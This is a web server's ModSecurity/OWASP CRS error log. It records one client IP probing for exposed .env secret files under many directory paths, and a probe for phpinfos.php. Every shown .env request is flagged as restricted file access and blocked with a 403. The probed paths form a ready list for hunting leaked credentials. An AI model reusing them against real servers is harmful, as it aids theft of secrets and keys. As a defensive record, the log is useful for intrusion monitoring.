[Mon May 11 23:24:59.240544 2026] [security2:error] [pid 1630927:tid 1630940] [client 213.209.159.175:42472] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.save.1"] [unique_id "agJJK2iGYYhUwDaJINmgpwAAAUo"]
[Mon May 11 23:24:59.240988 2026] [security2:error] [pid 1630927:tid 1630940] [client 213.209.159.175:42472] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.save.1"] [unique_id "agJJK2iGYYhUwDaJINmgpwAAAUo"]
[Mon May 11 23:24:59.242318 2026] [security2:error] [pid 1630927:tid 1630940] [client 213.209.159.175:42472] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK2iGYYhUwDaJINmgpwAAAUo"]
[Mon May 11 23:24:59.286074 2026] [security2:error] [pid 1590352:tid 1590408] [client 213.209.159.175:42484] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/API/.env"] [unique_id "agJJK61q0G_aXAqWauQNIAAAAJA"]
[Mon May 11 23:24:59.286332 2026] [security2:error] [pid 1590352:tid 1590408] [client 213.209.159.175:42484] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/API/.env"] [unique_id "agJJK61q0G_aXAqWauQNIAAAAJA"]
[Mon May 11 23:24:59.289608 2026] [security2:error] [pid 1590352:tid 1590408] [client 213.209.159.175:42484] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK61q0G_aXAqWauQNIAAAAJA"]
[Mon May 11 23:24:59.384508 2026] [security2:error] [pid 1606352:tid 1606438] [client 213.209.159.175:42504] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admin1/.env"] [unique_id "agJJK3o_DFxNSZVmaX3kIgAAANM"]
[Mon May 11 23:24:59.385075 2026] [security2:error] [pid 1606352:tid 1606438] [client 213.209.159.175:42504] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admin1/.env"] [unique_id "agJJK3o_DFxNSZVmaX3kIgAAANM"]
[Mon May 11 23:24:59.389319 2026] [security2:error] [pid 1606352:tid 1606438] [client 213.209.159.175:42504] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK3o_DFxNSZVmaX3kIgAAANM"]
[Mon May 11 23:24:59.430064 2026] [security2:error] [pid 1588898:tid 1588917] [client 213.209.159.175:42516] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admincp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admincp/.env"] [unique_id "agJJK6FW67LJTsgN3jQgMAAAABI"]
[Mon May 11 23:24:59.430544 2026] [security2:error] [pid 1588898:tid 1588917] [client 213.209.159.175:42516] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admincp/.env"] [unique_id "agJJK6FW67LJTsgN3jQgMAAAABI"]
[Mon May 11 23:24:59.431331 2026] [security2:error] [pid 1588898:tid 1588917] [client 213.209.159.175:42516] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK6FW67LJTsgN3jQgMAAAABI"]
[Mon May 11 23:24:59.475417 2026] [security2:error] [pid 1601130:tid 1601168] [client 213.209.159.175:42526] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admins/.env"] [unique_id "agJJK3EgAO_835W6c1mpfQAAAFI"]
[Mon May 11 23:24:59.475636 2026] [security2:error] [pid 1601130:tid 1601168] [client 213.209.159.175:42526] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admins/.env"] [unique_id "agJJK3EgAO_835W6c1mpfQAAAFI"]
[Mon May 11 23:24:59.478333 2026] [security2:error] [pid 1601130:tid 1601168] [client 213.209.159.175:42526] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK3EgAO_835W6c1mpfQAAAFI"]
[Mon May 11 23:24:59.502211 2026] [security2:error] [pid 1601130:tid 1601168] [client 213.209.159.175:42526] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /novnc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/novnc/.env"] [unique_id "agJJK3EgAO_835W6c1mpfgAAAFI"]
[Mon May 11 23:24:59.502414 2026] [security2:error] [pid 1601130:tid 1601168] [client 213.209.159.175:42526] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/novnc/.env"] [unique_id "agJJK3EgAO_835W6c1mpfgAAAFI"]
[Mon May 11 23:24:59.503036 2026] [security2:error] [pid 1601130:tid 1601168] [client 213.209.159.175:42526] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK3EgAO_835W6c1mpfgAAAFI"]
[Mon May 11 23:24:59.601795 2026] [security2:error] [pid 1590352:tid 1590414] [client 213.209.159.175:42540] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/.env.conf"] [unique_id "agJJK61q0G_aXAqWauQNIQAAAJY"]
[Mon May 11 23:24:59.602011 2026] [security2:error] [pid 1590352:tid 1590414] [client 213.209.159.175:42540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/.env.conf"] [unique_id "agJJK61q0G_aXAqWauQNIQAAAJY"]
[Mon May 11 23:24:59.603353 2026] [security2:error] [pid 1590352:tid 1590414] [client 213.209.159.175:42540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK61q0G_aXAqWauQNIQAAAJY"]
[Mon May 11 23:24:59.646426 2026] [security2:error] [pid 1605480:tid 1605545] [client 213.209.159.175:42556] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env0.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/.env0.2"] [unique_id "agJJKx2Cvzd_nyNfUm8S_AAAARc"]
[Mon May 11 23:24:59.646654 2026] [security2:error] [pid 1605480:tid 1605545] [client 213.209.159.175:42556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/.env0.2"] [unique_id "agJJKx2Cvzd_nyNfUm8S_AAAARc"]
[Mon May 11 23:24:59.651252 2026] [security2:error] [pid 1605480:tid 1605545] [client 213.209.159.175:42556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKx2Cvzd_nyNfUm8S_AAAARc"]
[Mon May 11 23:24:59.693768 2026] [security2:error] [pid 1606352:tid 1606429] [client 213.209.159.175:42572] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/opt/.env"] [unique_id "agJJK3o_DFxNSZVmaX3kIwAAAMo"]
[Mon May 11 23:24:59.694350 2026] [security2:error] [pid 1606352:tid 1606429] [client 213.209.159.175:42572] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/opt/.env"] [unique_id "agJJK3o_DFxNSZVmaX3kIwAAAMo"]
[Mon May 11 23:24:59.697170 2026] [security2:error] [pid 1606352:tid 1606429] [client 213.209.159.175:42572] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK3o_DFxNSZVmaX3kIwAAAMo"]
[Mon May 11 23:24:59.739217 2026] [security2:error] [pid 1588898:tid 1588900] [client 213.209.159.175:42586] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /owncloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/owncloud/.env"] [unique_id "agJJK6FW67LJTsgN3jQgMgAAAAA"]
[Mon May 11 23:24:59.739431 2026] [security2:error] [pid 1588898:tid 1588900] [client 213.209.159.175:42586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/owncloud/.env"] [unique_id "agJJK6FW67LJTsgN3jQgMgAAAAA"]
[Mon May 11 23:24:59.740624 2026] [security2:error] [pid 1588898:tid 1588900] [client 213.209.159.175:42586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK6FW67LJTsgN3jQgMgAAAAA"]
[Mon May 11 23:24:59.834876 2026] [security2:error] [pid 1605480:tid 1605531] [client 213.209.159.175:42600] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /path/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/path/.env"] [unique_id "agJJKx2Cvzd_nyNfUm8S_gAAAQk"]
[Mon May 11 23:24:59.835198 2026] [security2:error] [pid 1605480:tid 1605531] [client 213.209.159.175:42600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/path/.env"] [unique_id "agJJKx2Cvzd_nyNfUm8S_gAAAQk"]
[Mon May 11 23:24:59.836989 2026] [security2:error] [pid 1605480:tid 1605531] [client 213.209.159.175:42600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKx2Cvzd_nyNfUm8S_gAAAQk"]
[Mon May 11 23:24:59.863331 2026] [security2:error] [pid 1605480:tid 1605531] [client 213.209.159.175:42600] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/.env.conf"] [unique_id "agJJKx2Cvzd_nyNfUm8S_wAAAQk"]
[Mon May 11 23:24:59.863545 2026] [security2:error] [pid 1605480:tid 1605531] [client 213.209.159.175:42600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/.env.conf"] [unique_id "agJJKx2Cvzd_nyNfUm8S_wAAAQk"]
[Mon May 11 23:24:59.864235 2026] [security2:error] [pid 1605480:tid 1605531] [client 213.209.159.175:42600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKx2Cvzd_nyNfUm8S_wAAAQk"]
[Mon May 11 23:24:59.911700 2026] [security2:error] [pid 1601130:tid 1601160] [client 213.209.159.175:42614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/.env.dist"] [unique_id "agJJK3EgAO_835W6c1mpgAAAAEo"]
[Mon May 11 23:24:59.911934 2026] [security2:error] [pid 1601130:tid 1601160] [client 213.209.159.175:42614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/.env.dist"] [unique_id "agJJK3EgAO_835W6c1mpgAAAAEo"]
[Mon May 11 23:24:59.913188 2026] [security2:error] [pid 1601130:tid 1601160] [client 213.209.159.175:42614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK3EgAO_835W6c1mpgAAAAEo"]
[Mon May 11 23:25:00.050286 2026] [:error] [pid 1605480:tid 1605525] [client 213.209.159.175:42652] File does not exist: /var/www/html/phpinfos.php
